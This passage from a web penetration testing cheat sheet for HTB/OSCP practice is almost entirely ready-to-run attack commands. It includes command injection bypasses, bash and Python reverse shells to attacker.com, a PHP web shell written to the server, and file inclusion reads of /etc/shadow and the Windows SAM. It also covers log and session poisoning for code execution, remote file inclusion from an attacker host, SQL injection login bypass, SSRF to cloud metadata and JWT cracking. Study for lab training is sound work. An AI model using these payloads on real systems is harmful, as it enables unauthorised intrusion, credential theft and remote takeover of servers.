curl -X POST -d "ip=127.0.0.1;w'h'o'a'm'i" http://target.com/ping.php      # Quote separation
curl -X POST -d "ip=127.0.0.1;who\ami" http://target.com/ping.php           # Backslash separation
curl -X POST -d "ip=127.0.0.1;\$IFS\$9whoami" http://target.com/ping.php    # IFS (Internal Field Separator)

# Reverse shell via command injection
curl -X POST -d "ip=127.0.0.1; bash -i >& /dev/tcp/attacker.com/4444 0>&1" http://target.com/ping.php
# Bash reverse shell
# Establishes connection back to attacker

curl -X POST -d "ip=127.0.0.1; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker.com\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" http://target.com/ping.php
# Python reverse shell
# Alternative to bash shell

# File write via command injection
curl -X POST -d "ip=127.0.0.1; echo '<?php system(\$_GET[\"cmd\"]); ?>' > /var/www/html/shell.php" http://target.com/ping.php
# Writes web shell to server
# Persistent access via web interface

Local File Inclusion (LFI) and Remote File Inclusion (RFI)

File Inclusion Vulnerability Testing

What file inclusion vulnerabilities are: Flaws that allow including arbitrary files in web application execution, leading to information disclosure or code execution.

Why file inclusion is critical: Can lead to source code disclosure, system file access, and remote code execution. Common in PHP applications.

# Basic Local File Inclusion (LFI) testing
curl "http://target.com/page.php?file=../../../etc/passwd"
curl "http://target.com/page.php?file=../../../etc/shadow"
curl "http://target.com/page.php?file=../../../var/log/apache2/access.log"
# Path traversal to access system files
# Common targets: /etc/passwd, /etc/shadow, log files

# Windows LFI testing
curl "http://target.com/page.php?file=../../../windows/system32/drivers/etc/hosts"
curl "http://target.com/page.php?file=../../../windows/system32/config/sam"
# Windows system files
# Different path structure and file locations

# PHP wrapper exploitation
curl "http://target.com/page.php?file=php://filter/convert.base64-encode/resource=index.php"
# Base64 encodes PHP source code
# Reveals application source code

curl "http://target.com/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B"
# Data wrapper for code execution
# Base64 encoded: <?php system($_GET['cmd']); ?>

curl "http://target.com/page.php?file=expect://whoami"
# Expect wrapper for command execution
# Direct command execution if enabled

# Log poisoning for RCE
curl -H "User-Agent: <?php system(\$_GET['cmd']); ?>" http://target.com/
curl "http://target.com/page.php?file=../../../var/log/apache2/access.log&cmd=whoami"
# Injects PHP code into log file
# Executes code when log is included

# Session file poisoning
curl -b "PHPSESSID=malicious" -X POST -d "data=<?php system(\$_GET['cmd']); ?>" http://target.com/session.php
curl "http://target.com/page.php?file=../../../var/lib/php/sessions/sess_malicious&cmd=whoami"
# Injects code into session file
# Executes when session file is included

# Remote File Inclusion (RFI) testing
curl "http://target.com/page.php?file=http://attacker.com/shell.txt"
# Includes remote file containing malicious code
# shell.txt contains: <?php system($_GET['cmd']); ?>

# FTP-based RFI
curl "http://target.com/page.php?file=ftp://attacker.com/shell.php"
# Alternative protocol for RFI
# May bypass HTTP-based filtering

# Filter bypass techniques
curl "http://target.com/page.php?file=....//....//....//etc/passwd"        # Double encoding
curl "http://target.com/page.php?file=..%2f..%2f..%2fetc%2fpasswd"         # URL encoding
curl "http://target.com/page.php?file=..%252f..%252f..%252fetc%252fpasswd" # Double URL encoding
curl "http://target.com/page.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" # Full encoding

OWASP Top 10 Testing Methodology

Systematic OWASP Top 10 Testing Approach

Why OWASP Top 10 methodology is important: Provides structured approach to web application testing, ensures comprehensive coverage of most critical vulnerabilities.

# A01: Broken Access Control
# Test for horizontal and vertical privilege escalation
curl -b "session=user1_session" http://target.com/profile.php?user_id=2     # Horizontal escalation
curl -b "session=user_session" -X POST -d "role=admin" http://target.com/update_profile.php  # Vertical escalation

# A02: Cryptographic Failures
# Test for weak encryption and exposed sensitive data
curl -k https://target.com                   # Check SSL/TLS configuration
curl http://target.com/config.php            # Look for exposed configuration files
curl http://target.com/backup.sql            # Check for database backups

# A03: Injection (SQL, NoSQL, OS Command, LDAP)
# Comprehensive injection testing (covered in detail above)
sqlmap -u "http://target.com/page.php?id=1" --batch
curl -X POST -d "ip=127.0.0.1; whoami" http://target.com/ping.php

# A04: Insecure Design
# Test business logic and application flow
curl -X POST -d "step=3" http://target.com/checkout.php  # Workflow bypass
curl -X POST -d "price=0.01" http://target.com/purchase.php  # Price manipulation

# A05: Security Misconfiguration
# Check for default configurations and unnecessary features
curl http://target.com/admin/                # Default admin interfaces
curl -X OPTIONS http://target.com/           # Dangerous HTTP methods
curl http://target.com/.git/config           # Exposed version control

# A06: Vulnerable and Outdated Components
# Check component versions and known vulnerabilities
whatweb http://target.com                    # Technology identification
curl http://target.com/vendor/composer.json  # Dependency information

# A07: Identification and Authentication Failures
# Test authentication mechanisms (covered in detail above)
curl -X POST -d "username=admin&password=" http://target.com/login.php  # Empty password
curl -X POST -d "username=admin' OR '1'='1'--&password=any" http://target.com/login.php

# A08: Software and Data Integrity Failures
# Test for insecure deserialization and supply chain attacks
curl -X POST -H "Content-Type: application/x-java-serialized-object" --data-binary @malicious.ser http://target.com/api
curl http://target.com/package.json          # Check for dependency confusion

# A09: Security Logging and Monitoring Failures
# Test for proper logging and monitoring (mostly manual review)
curl -X POST -d "username=admin&password=wrong" http://target.com/login.php
# Check if failed login attempts are logged and monitored

# A10: Server-Side Request Forgery (SSRF)
# Comprehensive SSRF testing (covered in detail above)
curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" http://target.com/fetch.php

Web Application Testing Automation and Scripting

Custom Testing Scripts for HTB/OSCP

# Comprehensive web application testing script
cat > web_test.sh << 'EOF'
#!/bin/bash

target=$1
if [ -z "$target" ]; then
    echo "Usage: $0 <target_url>"
    exit 1
fi

echo "[+] Starting comprehensive web application testing for $target"

# Technology identification
echo "[+] Identifying technologies..."
whatweb "$target"

# Directory enumeration
echo "[+] Directory enumeration..."
gobuster dir -u "$target" -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,bak -o gobuster_results.txt

# SQL injection testing
echo "[+] SQL injection testing..."
sqlmap -u "$target" --batch --level=3 --risk=2 -o sqlmap_results/

# XSS testing
echo "[+] XSS testing..."
curl "$target/search.php?q=<script>alert('XSS')</script>" | grep -i "script\|alert"

# File upload testing (if upload form exists)
echo "[+] File upload testing..."
echo "<?php system(\$_GET['cmd']); ?>" > test_shell.php
curl -X POST -F "file=@test_shell.php" "$target/upload.php"

# SSRF testing
echo "[+] SSRF testing..."
curl -X POST -d "url=http://127.0.0.1:22" "$target/fetch.php" | grep -i "ssh\|denied\|refused"

echo "[+] Testing completed. Check individual result files for details."
EOF
chmod +x web_test.sh

# Automated vulnerability scanner integration
cat > full_web_scan.sh << 'EOF'
#!/bin/bash

target=$1
output_dir="scan_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$output_dir"

echo "[+] Comprehensive web application scan starting..."

# Nikto scan
nikto -h "$target" -output "$output_dir/nikto.txt"

# Nuclei scan
nuclei -u "$target" -o "$output_dir/nuclei.txt"

# Custom payload testing
for payload in "'" "\"" "<script>" "{{7*7}}" "\${7*7}"; do
    echo "[+] Testing payload: $payload"
    curl "$target/search.php?q=$payload" > "$output_dir/payload_$(echo $payload | tr '<>{} '_').txt"
done

echo "[+] Scan completed. Results in $output_dir/"
EOF
chmod +x full_web_scan.sh

Advanced Web Application Testing Techniques

Manual Testing Methodologies for Complex Applications

# API testing methodology
# 1. API endpoint discovery
curl -X GET http://target.com/api/v1/
curl -X GET http://target.com/api/v2/
curl -X GET http://target.com/graphql
curl -X OPTIONS http://target.com/api/users

# 2. API authentication testing
curl -X POST -H "Content-Type: application/json" -d '{"username":"admin","password":"password"}' http://target.com/api/auth/login

# 3. API parameter fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -u http://target.com/api/FUZZ -fc 404

# 4. GraphQL testing
curl -X POST -H "Content-Type: application/json" -d '{"query":"query{__schema{types{name}}}"}' http://target.com/graphql
# GraphQL introspection query
# Reveals API schema and available queries

# JWT token testing
# 1. JWT token analysis
python3 -c "
import jwt
import base64
token = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...'
print(jwt.decode(token, options={'verify_signature': False}))
"

# 2. JWT algorithm confusion
# Change algorithm from RS256 to HS256 and use public key as secret

# 3. JWT weak secret brute forcing
hashcat -a 0 -m 16500 jwt_token.txt /usr/share/wordlists/rockyou.txt

# WebSocket testing
# 1. WebSocket connection testing
curl --include --no-buffer --header "Connection: Upgrade" --header "Upgrade: websocket" --header "Sec-WebSocket-Key: SGVsbG8sIHdvcmxkIQ==" --header "Sec-WebSocket-Version: 13" http://target.com/websocket

# 2. WebSocket message fuzzing (requires specialized tools)
# Use tools like websocket-client or custom scripts

# Content Security Policy (CSP) bypass testing
curl -I http://target.com/ | grep -i "content-security-policy"
# Analyze CSP header for bypass opportunities
# Look for unsafe-inline, unsafe-eval, wildcard domains

Web Application Testing Summary and Methodology

HTB/OSCP Web Testing Checklist

Systematic approach for comprehensive web application testing:

Information Gathering
Technology stack identification (whatweb, wappalyzer)
Directory and file enumeration (gobuster, ffuf)
Source code analysis (view-source, developer tools)
robots.txt, sitemap.xml analysis
Input Validation Testing
SQL injection (sqlmap, manual testing)
XSS (reflected, stored, DOM-based)
Command injection (various command separators)
File inclusion (LFI/RFI with various wrappers)
XXE injection (file disclosure, SSRF)
Authentication and Session Management
Authentication bypass (SQL injection, logic flaws)
Session management (token analysis, fixation, hijacking)
Password policy testing
Multi-factor authentication bypass
Authorization Testing
Horizontal privilege escalation
Vertical privilege escalation
Direct object reference vulnerabilities
Path traversal and access control bypasses
Business Logic Testing
Workflow bypass
Price manipulation
Quantity manipulation
Rate limiting bypass
Transaction integrity
File Upload Testing
Extension bypass
MIME type bypass
File signature bypass
Path traversal in uploads
Polyglot file creation
Advanced Vulnerability Testing
SSRF (internal network access, cloud metadata)
Deserialization vulnerabilities
Template injection
LDAP injection
NoSQL injection

Key Success Factors for HTB/OSCP:
- Methodology over tools - Follow systematic approach
- Manual testing - Don't rely solely on automated scanners
- Context awareness - Understand application functionality
- Chaining vulnerabilities - Combine findings for maximum impact
- Documentation - Keep detailed notes of all findings and techniques

This comprehensive web application testing methodology covers the essential techniques needed for HTB challenges and OSCP exam scenarios, providing both automated and manual testing approaches for maximum coverage.

Last updated: 2025-08-26 20:00 UTC